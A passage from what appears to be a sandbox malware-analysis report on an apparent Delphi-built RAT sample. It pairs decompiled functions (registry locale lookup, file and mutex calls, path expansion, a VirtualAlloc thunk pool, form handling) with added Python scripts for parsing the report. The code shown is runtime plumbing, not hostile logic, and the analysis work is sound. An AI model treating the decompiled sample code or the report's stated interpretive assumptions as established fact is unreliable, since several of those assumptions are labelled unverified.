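QUALITY_LINE = re.compile(r"^\s*C-Code - Quality:\s*(?P<q>\d+)%")
# Keys the Delphi runtime reads (HKCU, HKLM, then HKCU Delphi) to pick a locale resource DLL.
DELPHI_LOCALE_KEYS = {r"Software\Borland\Locales", r"Software\Borland\Delphi\Locales"}

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    caller: Optional[str] = None  # address of the subcall function, if any

    @property
    def unresolved(self) -> bool:
        """True when the 'API name' is really an import slot address."""
        return re.fullmatch(HEX8, self.api) is not None

@dataclass
class FunctionEntry:
    name: str
    quality: int
    calls: List[ApiCall] = field(default_factory=list)

def parse_report(text: str) -> List[FunctionEntry]:
    """Attach every API line to the most recently seen decompiled function."""
    entries: List[FunctionEntry] = []
    pending_quality: Optional[int] = None
    for line in text.splitlines():
        q = QUALITY_LINE.match(line)
        if q:
            pending_quality = int(q.group("q"))
            continue
        f = FUNC_LINE.match(line)
        if f and pending_quality is not None:
            entries.append(FunctionEntry(f.group("name"), pending_quality))
            pending_quality = None
            continue
        m = API_LINE.match(line)
        if m and entries:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            entries[-1].calls.append(ApiCall(m.group("api"), m.group("module"), args,
                                             m.group("ref").upper(), m.group("caller")))
    return entries

def is_delphi_locale_lookup(entry: FunctionEntry) -> bool:
    """Direct or subcall RegOpenKeyExA on one of the Delphi locale keys."""
    return any(c.api == "RegOpenKeyExA" and any(a in DELPHI_LOCALE_KEYS for a in c.args)
               for c in entry.calls)

def summarize(entries: List[FunctionEntry]) -> Dict[str, dict]:
    """Per function: quality, distinct API names, unresolved names, Delphi flag."""
    return {e.name: {"quality": e.quality,
                     "apis": sorted({c.api for c in e.calls}),
                     "unresolved": [c.api for c in e.calls if c.unresolved],
                     "delphi_locale_lookup": is_delphi_locale_lookup(e)}
            for e in entries}

# Excerpt copied from the E00405F94 and E0043EAF8 entries of this report.
REPORT_EXCERPT = r"""
C-Code - Quality: 100%
E00405F94(void* __eax) {
• GetModuleFileNameA.KERNEL32(?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?,00000400,?,004174D4,0041AC1B,00000000,0041AC40), ref: 00405FB2
  • Part of subcall function 004061D0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001,004174D4,00405FFC,00406AA0,0000FF8A,?), ref: 004061EC
  • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000,?,00405FC0,?,?,00000105,00000001), ref: 0040620A
  • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,00000000), ref: 00406228
  • Part of subcall function 004061D0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00406246
  • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040628F
  • Part of subcall function 004061D0: RegQueryValueExA.ADVAPI32(?,0040643C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004062D5,?,80000001), ref: 004062AD
  • Part of subcall function 004061D0: RegCloseKey.ADVAPI32(?,004062DC,00000000,00000000,00000005,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004062CF
C-Code - Quality: 51%
E0043EAF8(intOrPtr __eax) {
• 733B9840.USER32(?,00000000,0043EB45), ref: 0043EB20
  • Part of subcall function 0040E79C: GetLastError.KERNEL32(00000000,0040E82C), ref: 0040E7B6
"""

if __name__ == "__main__":
    for name, info in summarize(parse_report(REPORT_EXCERPT)).items():
        print(name, info)
```

Run it over the full report text instead of the excerpt to get one record per decompiled function; functions whose only API activity is the Delphi locale lookup can then be set aside, and every entry with a non-empty "unresolved" list is one where the call target has to be recovered from the memory dump rather than read off the page.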

                                                    C-Code - Quality: 75%
                                                    			E00409974(void* __eax, long __ecx, void* __edx) {
                                                    				long _v16;
                                                    				int _t4;
                                                    
                                                    				_push(__ecx);
                                                    				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
                                                    				if(_t4 == 0) {
                                                    					_v16 = 0xffffffff;
                                                    				}
                                                    				return _v16;
                                                    			}

                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00409988
                                                    • API ID: FileWrite

                                                    C-Code - Quality: 100%
                                                    			E00409A58(void* __eax) {
                                                    				signed char _t5;
                                                    
                                                    				_t5 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                    				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                    					return 0;
                                                    				} else {
                                                    					return 1;
                                                    				}
                                                    			}

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00473256,?,?,00000000,00000005,?,00000000,004732A8,?,00000000,00473306), ref: 00409A63
                                                    • API ID: AttributesFile

                                                    C-Code - Quality: 68%
                                                    			E00406F8E(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                    				void* _t8;
                                                    
                                                    				_t4 = _a12;
                                                    				asm("sbb eax, eax");
                                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                    				return _t8;
                                                    			}

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    • API ID: CreateMutex

                                                    C-Code - Quality: 68%
                                                    			E00406F90(struct _SECURITY_ATTRIBUTES* _a4, void* _a8, CHAR* _a12) {
                                                    				void* _t8;
                                                    
                                                    				_t4 = _a12;
                                                    				asm("sbb eax, eax");
                                                    				_t8 = CreateMutexA(_a4,  &(_a12[1]) & 0x0000007f, _t4); // executed
                                                    				return _t8;
                                                    			}

                                                    APIs
                                                    • CreateMutexA.KERNEL32(?,?,?,?,?), ref: 00406FA6
                                                    • API ID: CreateMutex

                                                    C-Code - Quality: 100%
                                                    			E0040991C(void* __eax) {
                                                    				void* _t4;
                                                    
                                                    				_t4 = CreateFileA(E00404E80(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
                                                    				return _t4;
                                                    			}

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00418E54,00409945,0041DBE4,00000000,0041DCC1,?,?,00418E54,00000001), ref: 00409939
                                                    • API ID: CreateFile

                                                    C-Code - Quality: 100%
                                                    			E0045D2F8(signed int __eax, void* __ecx) {
                                                    				struct _ITEMIDLIST** _t10;
                                                    
                                                    				SHGetSpecialFolderLocation(0,  *(0x49bf84 + (__eax & 0x0000007f) * 4), _t10); // executed
                                                    				return  *_t10;
                                                    			}

                                                    APIs
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,?,0045F1FB,00000000,0045F21D,?,00000000,0045F23F,?,?,?,?,00000000), ref: 0045D307
                                                    • API ID: FolderLocationSpecial

                                                    C-Code - Quality: 100%
                                                    			E00409A7C(void* __eax) {
                                                    				long _t4;
                                                    
                                                    				_t4 = GetFileAttributesA(E00404E80(__eax)); // executed
                                                    				return _t4;
                                                    			}

                                                    APIs
                                                    • GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                    • API ID: AttributesFile

                                                    C-Code - Quality: 100%
                                                    			E00435634(void* __eax) {
                                                    				int _t3;
                                                    
                                                    				 *((char*)(__eax + 0x10)) = 3;
                                                    				_t3 = WinHelpA(0, 0x43564c, 2, 0); // executed
                                                    				return _t3;
                                                    			}

                                                    APIs
                                                    • API ID: Help
                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00422BCC(intOrPtr _a4, intOrPtr _a8) {
                                                    				void* _t14;
                                                    				void _t15;
                                                    				intOrPtr _t25;
                                                    				char* _t26;
                                                    				void* _t35;
                                                    
                                                    				if( *0x49e88c == 0) {
                                                    					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                    					_t35 = _t14;
                                                    					_t15 =  *0x49e888; // 0x2220000
                                                    					 *_t35 = _t15;
                                                    					_t1 = _t35 + 4; // 0x4
                                                    					E004029DC(0x49b5c8, 2, _t1);
                                                    					_t2 = _t35 + 5; // 0x5
                                                    					 *((intOrPtr*)(_t35 + 6)) = E00422BC4(_t2, E00422BA4);
                                                    					_t4 = _t35 + 0xa; // 0xa
                                                    					_t26 = _t4;
                                                    					do {
                                                    						 *_t26 = 0xe8;
                                                    						_t5 = _t35 + 4; // 0x4
                                                    						 *((intOrPtr*)(_t26 + 1)) = E00422BC4(_t26, _t5);
                                                    						 *((intOrPtr*)(_t26 + 5)) =  *0x49e88c;
                                                    						 *0x49e88c = _t26;
                                                    						_t26 = _t26 + 0xd;
                                                    					} while (_t26 - _t35 < 0xffc);
                                                    					 *0x49e888 = _t35;
                                                    				}
                                                    				_t25 =  *0x49e88c;
                                                    				 *0x49e88c =  *((intOrPtr*)(_t25 + 5));
                                                    				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                    				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                    				return  *0x49e88c;
                                                    			}

                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00422BEA
                                                    • API ID: AllocVirtual
                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 53%
                                                    			E00406018(char* __eax, intOrPtr __edx) {
                                                    				char* _v8;
                                                    				intOrPtr _v12;
                                                    				intOrPtr _v16;
                                                    				struct _WIN32_FIND_DATAA _v334;
                                                    				char _v595;
                                                    				void* _t45;
                                                    				char* _t54;
                                                    				char* _t64;
                                                    				void* _t83;
                                                    				intOrPtr* _t84;
                                                    				char* _t90;
                                                    				struct HINSTANCE__* _t91;
                                                    				char* _t93;
                                                    				void* _t94;
                                                    				char* _t95;
                                                    				void* _t96;
                                                    
                                                    				_v12 = __edx;                                  // caller's output buffer size (third lstrcpyn argument below)
                                                    				_v8 = __eax;                                   // path to expand; also the output buffer
                                                    				_v16 = _v8;                                    // return value: always the input pointer
                                                    				_t91 = GetModuleHandleA("kernel32.dll");
                                                    				if(_t91 == 0) {
                                                    					L4:
                                                    					if( *_v8 != 0x5c) {
                                                    						_t93 = _v8 + 2;                            // "X:" drive prefix is copied verbatim; the walk starts after it
                                                    						goto L10;
                                                    					} else {
                                                    						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                    							_t95 = E00406004(_v8 + 2);               // UNC "\\server\share": skip two components (E00406004 appears to return the next '\' or the terminator)
                                                    							if( *_t95 != 0) {
                                                    								_t14 = _t95 + 1; // 0x1
                                                    								_t93 = E00406004(_t14);
                                                    								if( *_t93 != 0) {
                                                    									L10:
                                                    									_t83 = _t93 - _v8;
                                                    									_push(_t83 + 1);
                                                    									_push(_v8);
                                                    									_push( &_v595);
                                                    									L0040131C();                          // lstrcpyn import thunk (see the APIs list): copy the prefix into the work buffer
                                                    									while( *_t93 != 0) {
                                                    										_t90 = E00406004(_t93 + 1);
                                                    										_t45 = _t90 - _t93;
                                                    										if(_t45 + _t83 + 1 <= 0x105) {      // bounds check: prefix + "\component" + NUL must fit the 0x105-byte buffer
                                                    											_push(_t45 + 1);
                                                    											_push(_t93);
                                                    											_push( &(( &_v595)[_t83]));
                                                    											L0040131C();
                                                    											_t94 = FindFirstFileA( &_v595,  &_v334);   // resolve this component; cFileName receives its long name
                                                    											if(_t94 != 0xffffffff) {
                                                    												FindClose(_t94);
                                                    												_t54 =  &(_v334.cFileName);
                                                    												_push(_t54);
                                                    												L00401324();                  // lstrlen import thunk
                                                    												if(_t54 + _t83 + 1 + 1 <= 0x105) {   // second bounds check: prefix + '\' + long name + NUL
                                                    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                    													_push(0x105 - _t83 - 1);
                                                    													_push( &(_v334.cFileName));
                                                    													_push( &(( &(( &_v595)[_t83]))[1]));
                                                    													L0040131C();
                                                    													_t64 =  &(_v334.cFileName);
                                                    													_push(_t64);
                                                    													L00401324();
                                                    													_t83 = _t83 + _t64 + 1;
                                                    													_t93 = _t90;
                                                    													continue;
                                                    												}
                                                    											}
                                                    										}
                                                    										goto L17;                           // lookup failed or buffer exhausted: the caller's buffer is left untouched
                                                    									}
                                                    									_push(_v12);
                                                    									_push( &_v595);
                                                    									_push(_v8);
                                                    									L0040131C();                          // lstrcpyn(path, work buffer, _v12): written back only after every component resolved
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    				} else {
                                                    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");   // resolved dynamically so the module also loads where the export is absent
                                                    					if(_t84 == 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						_push(0x105);
                                                    						_push( &_v595);
                                                    						_push(_v8);
                                                    						if( *_t84() == 0) {                        // GetLongPathNameA(path, buf, 0x105); only a zero return falls back, so a nonzero "buffer too small" return (the required length) is treated as success
                                                    							goto L4;
                                                    						} else {
                                                    							_push(_v12);
                                                    							_push( &_v595);
                                                    							_push(_v8);
                                                    							L0040131C();
                                                    						}
                                                    					}
                                                    				}
                                                    				L17:
                                                    				return _v16;                                   // the input pointer; on any failure the caller's buffer is unchanged
                                                    			}
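The fallback path in E00406018 (the component walk taken when GetLongPathNameA is unavailable or fails) is easier to reason about as a model than as decompiler output. The script below is an added example written for this page, not code from the report or from the sample: it re-implements the walk in Python over a constructed in-memory directory tree that stands in for FindFirstFileA, and keeps the routine's two length checks against its 0x105-byte work buffer and its write-back-only-on-full-success behaviour. It assumes that E00406004, which is not shown on this page, returns a pointer to the next backslash or to the string terminator, which is what the loop's length arithmetic implies.

```python
from typing import Dict, Optional

WORK_BUF = 0x105  # size of the routine's stack work buffer (_v595 - _v334 = 261 bytes = MAX_PATH + 1)

# Constructed sample tree, not taken from the sample: parent directory -> {long name: optional 8.3 alias}
TREE: Dict[str, Dict[str, Optional[str]]] = {
    "C:": {"Program Files": "PROGRA~1", "Users": None},
    "C:\\Program Files": {"Common Files": "COMMON~1"},
    "C:\\Users": {"analyst": None},
    "C:\\Users\\analyst": {"Documents": None},
    "\\\\srv\\share": {"Long Dir": "LONGDI~1"},
}
# Constructed tree whose only entry no longer fits the work buffer once "C:\" and the NUL are added
OVERSIZED_TREE: Dict[str, Dict[str, Optional[str]]] = {"C:": {"L" * 258: "S"}}


def fake_find_first_file(tree: Dict[str, Dict[str, Optional[str]]], probe: str) -> Optional[str]:
    """Stand-in for FindFirstFileA(probe, &fd): match the last component case-insensitively
    against long and short names and return fd.cFileName (the long name), or None on failure."""
    parent, _, leaf = probe.rpartition("\\")
    if not leaf:                     # a trailing '\' makes the real call fail as well
        return None
    for directory, entries in tree.items():
        if directory.casefold() != parent.casefold():
            continue
        for long_name, short_name in entries.items():
            if leaf.casefold() == long_name.casefold():
                return long_name
            if short_name is not None and leaf.casefold() == short_name.casefold():
                return long_name
    return None


def next_sep(path: str, start: int) -> int:
    """Assumed behaviour of E00406004 (not on this page): index of the next '\\' at or after
    start, or len(path) when there is none (the C code tests for the terminator there)."""
    i = path.find("\\", start)
    return len(path) if i == -1 else i


def expand_long_name(path: str, tree: Dict[str, Dict[str, Optional[str]]],
                     out_max: int = WORK_BUF) -> str:
    """Model of the fallback walk in E00406018. Returns the expanded path, or the input
    unchanged wherever the routine jumps to L17 without its final lstrcpyn."""
    if not path.startswith("\\"):
        cursor = 2                               # "X:" drive prefix is kept verbatim
    elif path.startswith("\\\\"):
        cursor = next_sep(path, 2)               # end of \\server
        if cursor >= len(path):
            return path
        cursor = next_sep(path, cursor + 1)      # end of \share
        if cursor >= len(path):
            return path
    else:
        return path                              # a single leading '\' is left alone
    buf = path[:cursor]                          # lstrcpyn(work, path, cursor + 1)
    used = cursor                                # _t83: bytes of the work buffer in use
    while cursor < len(path):
        nxt = next_sep(path, cursor + 1)
        segment = path[cursor:nxt]               # "\component" exactly as the caller typed it
        if len(segment) + used + 1 > WORK_BUF:   # first check: prefix + segment + NUL
            return path
        long_name = fake_find_first_file(tree, buf + segment)
        if long_name is None:                    # INVALID_HANDLE_VALUE
            return path
        if len(long_name) + used + 2 > WORK_BUF: # second check: prefix + '\' + long name + NUL
            return path
        buf = buf + "\\" + long_name
        used += len(long_name) + 1
        cursor = nxt
    return buf[:out_max - 1]                     # lstrcpyn(caller_buf, work, out_max)
```

The two length checks are the part worth keeping in mind during triage: a component list that resolves but whose long form would not fit in 261 bytes is silently discarded, and the caller continues with the short path it started with.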
                                                    Instruction address range for E00406018: 0x00406024 - 0x004061ab

                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                    • lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
                                                    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
                                                    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
                                                    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmp
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                    • API String ID: 3245196872-1565342463
                                                    • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                    • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                    • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
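The APIs and Similarity entries above are the report's own text. As an added example that is not part of the report, the script below parses the eleven API lines of E00406018 into structured records, pulls out the string literals among their arguments (which is where the Borland registry key surfaces), and rebuilds the report's API ID for the function from the parsed names. The grouping rule it uses (split each name on case changes, drop Get/Set and the A/W suffix, count tokens over all call sites, group by count descending, sort each group, join groups with "$") is an assumption fitted to this one function's key, which it reproduces; the report does not document the real rule, so treat any mismatch on another function as a signal to refine DROPPED_TOKENS rather than as a report error.

```python
import re
from collections import Counter
from typing import Dict, List, NamedTuple, Set, Tuple

# The eleven API lines copied verbatim from the APIs list of E00406018 above.
API_LINES = r"""
• GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
• GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
• lstrcpyn.KERNEL32(?,?,?,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
• lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
• lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000,004062D5), ref: 00406122
• FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278,00000000), ref: 0040612F
• lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,00000000,?,00406278), ref: 0040613B
• lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
• lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
• lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
"""

LINE_RE = re.compile(r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX32_RE = re.compile(r"^[0-9A-Fa-f]{8}$")
# Tokens dropped before building the key: an assumption fitted to this function's API ID, which it reproduces.
DROPPED_TOKENS = {"Get", "Set", "A", "W"}


class ApiCall(NamedTuple):
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's bullet lines into records; raises on a line that does not fit the format."""
    calls = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m is None:
            raise ValueError(f"unrecognised API line: {line!r}")
        calls.append(ApiCall(m["api"], m["module"], tuple(m["args"].split(",")), int(m["ref"], 16)))
    return calls


def refs_for(calls: List[ApiCall], api: str) -> List[int]:
    """Call sites of one API as the integer addresses behind the 'ref:' fields, ascending."""
    return sorted(c.ref for c in calls if c.api == api)


def literal_args(calls: List[ApiCall]) -> Set[str]:
    """Argument values that are neither unknown ('?') nor 32-bit hex words: the string literals
    the report recovered from the call chain."""
    return {a for c in calls for a in c.args if a != "?" and not HEX32_RE.match(a)}


def api_id_key(calls: List[ApiCall]) -> str:
    """Rebuild the report's API ID: split names on case changes, drop DROPPED_TOKENS, count
    tokens over all call sites, group by count (descending), sort each group, join with '$'."""
    counts: Counter = Counter()
    for c in calls:
        for token in re.findall(r"[A-Z][a-z0-9]*|[a-z0-9]+", c.api):
            if token not in DROPPED_TOKENS:
                counts[token] += 1
    groups: Dict[int, List[str]] = {}
    for token, n in counts.items():
        groups.setdefault(n, []).append(token)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))
```

Running api_id_key over the parsed lines yields lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc, the value the report lists under Similarity for this function, and literal_args returns the three strings kernel32.dll, GetLongPathNameA and Software\Borland\Locales, the last of which is what ties the surrounding code to the Delphi run-time library rather than to the RAT payload.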

                                                    C-Code - Quality: 83%
                                                    			/* Delphi VCL form show/hide handler; the field offsets and constants match TCustomForm.CMShowingChanged
                                                    			   (an interpretation from the constants and API usage; the listing is cut off below): +0x1c is ComponentState
                                                    			   (0x10 = csDesigning), +0x2f4 is FormState (0x04 = fsShowing, 0x08 = fsModal), +0x1a6 is Showing, +0x22f is
                                                    			   FormStyle (1 = fsMDIChild) and +0x230 is Position (4 = poScreenCenter, 5 = poDesktopCenter,
                                                    			   6 = poMainFormCenter, 7 = poOwnerFormCenter). GUI plumbing, not sample-specific logic. */
                                                    			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                    				intOrPtr* _v8;
                                                    				char _v12;
                                                    				intOrPtr _t149;
                                                    				intOrPtr _t154;
                                                    				intOrPtr _t155;
                                                    				intOrPtr _t160;
                                                    				intOrPtr _t162;
                                                    				intOrPtr _t163;
                                                    				void* _t165;
                                                    				struct HWND__* _t166;
                                                    				long _t176;
                                                    				signed int _t198;
                                                    				signed int _t199;
                                                    				long _t220;
                                                    				intOrPtr _t226;
                                                    				int _t231;
                                                    				intOrPtr _t232;
                                                    				intOrPtr _t241;
                                                    				intOrPtr _t245;
                                                    				signed int _t248;
                                                    				intOrPtr _t251;
                                                    				intOrPtr _t252;
                                                    				signed int _t258;
                                                    				long _t259;
                                                    				intOrPtr _t262;
                                                    				intOrPtr _t266;
                                                    				signed int _t269;
                                                    				intOrPtr _t270;
                                                    				intOrPtr _t271;
                                                    				signed int _t277;
                                                    				long _t278;
                                                    				intOrPtr _t281;
                                                    				signed int _t286;
                                                    				signed int _t287;
                                                    				long _t290;
                                                    				intOrPtr _t294;
                                                    				struct HWND__* _t299;
                                                    				signed int _t301;
                                                    				signed int _t302;
                                                    				signed int _t305;
                                                    				signed int _t307;
                                                    				long _t308;
                                                    				signed int _t311;
                                                    				signed int _t313;
                                                    				long _t314;
                                                    				signed int _t317;
                                                    				signed int _t318;
                                                    				signed int _t326;
                                                    				long _t328;
                                                    				intOrPtr _t331;
                                                    				intOrPtr _t362;
                                                    				long _t370;
                                                    				void* _t372;
                                                    				void* _t373;
                                                    				intOrPtr _t374;
                                                    
                                                    				_t372 = _t373;
                                                    				_t374 = _t373 + 0xfffffff8;
                                                    				_v12 = 0;
                                                    				_v8 = __eax;
                                                    				_push(_t372);
                                                    				_push(0x456ec6);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t374;
                                                    				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {   // not designing, and a show is already in progress
                                                    					_t294 =  *0x49de28; // 0x422f40
                                                    					E00406A70(_t294,  &_v12);              // load resource string, construct exception object, raise (the Delphi raise pattern)
                                                    					E0040D144(_v12, 1);
                                                    					E00404378();
                                                    				}
                                                    				_t149 =  *0x49ebb8; // 0x0
                                                    				E0045B100(_t149);
                                                    				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
                                                    				_push(_t372);
                                                    				_push(0x456ea9);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t374;
                                                    				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                    					_t155 = _v8;
                                                    					_t378 =  *((char*)(_t155 + 0x1a6));
                                                    					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                    						_push(_t372);
                                                    						_push(0x456db0);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t374;
                                                    						E00403DE8(_v8, __eflags);
                                                    						 *[fs:eax] = 0;
                                                    						_t160 =  *0x49ebbc; // 0x0
                                                    						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                    						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                    							__eflags = 0;
                                                    							E00455B08(_v8, 0);
                                                    						}
                                                    						_t162 = _v8;
                                                    						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                    						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                    							_t163 = _v8;
                                                    							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
                                                    							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
                                                    								_t299 = 0;
                                                    								_t165 = E00441704(_v8);
                                                    								_t166 = GetActiveWindow();
                                                    								__eflags = _t165 - _t166;
                                                    								if(_t165 == _t166) {
                                                    									_t176 = IsIconic(E00441704(_v8));
                                                    									__eflags = _t176;
                                                    									if(_t176 == 0) {
                                                    										_t299 = E00451750(E00441704(_v8));
                                                    									}
                                                    								}
                                                    								__eflags = _t299;
                                                    								if(_t299 == 0) {
                                                    									ShowWindow(E00441704(_v8), 0);     // SW_HIDE
                                                    								} else {
                                                    									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);   // SWP_NOSIZE|SWP_NOMOVE|SWP_NOZORDER|SWP_NOACTIVATE|SWP_HIDEWINDOW
                                                    									SetActiveWindow(_t299);             // then activate the window selected above
                                                    								}
                                                    							} else {
                                                    								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);   // modal form (fsModal): hide without activating another window
                                                    							}
                                                    						} else {
                                                    							E0043EC5C(_v8);
                                                    						}
                                                    					} else {
                                                    						_push(_t372);
                                                    						_push(0x456a14);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t374;
                                                    						E00403DE8(_v8, _t378);
                                                    						 *[fs:eax] = 0;
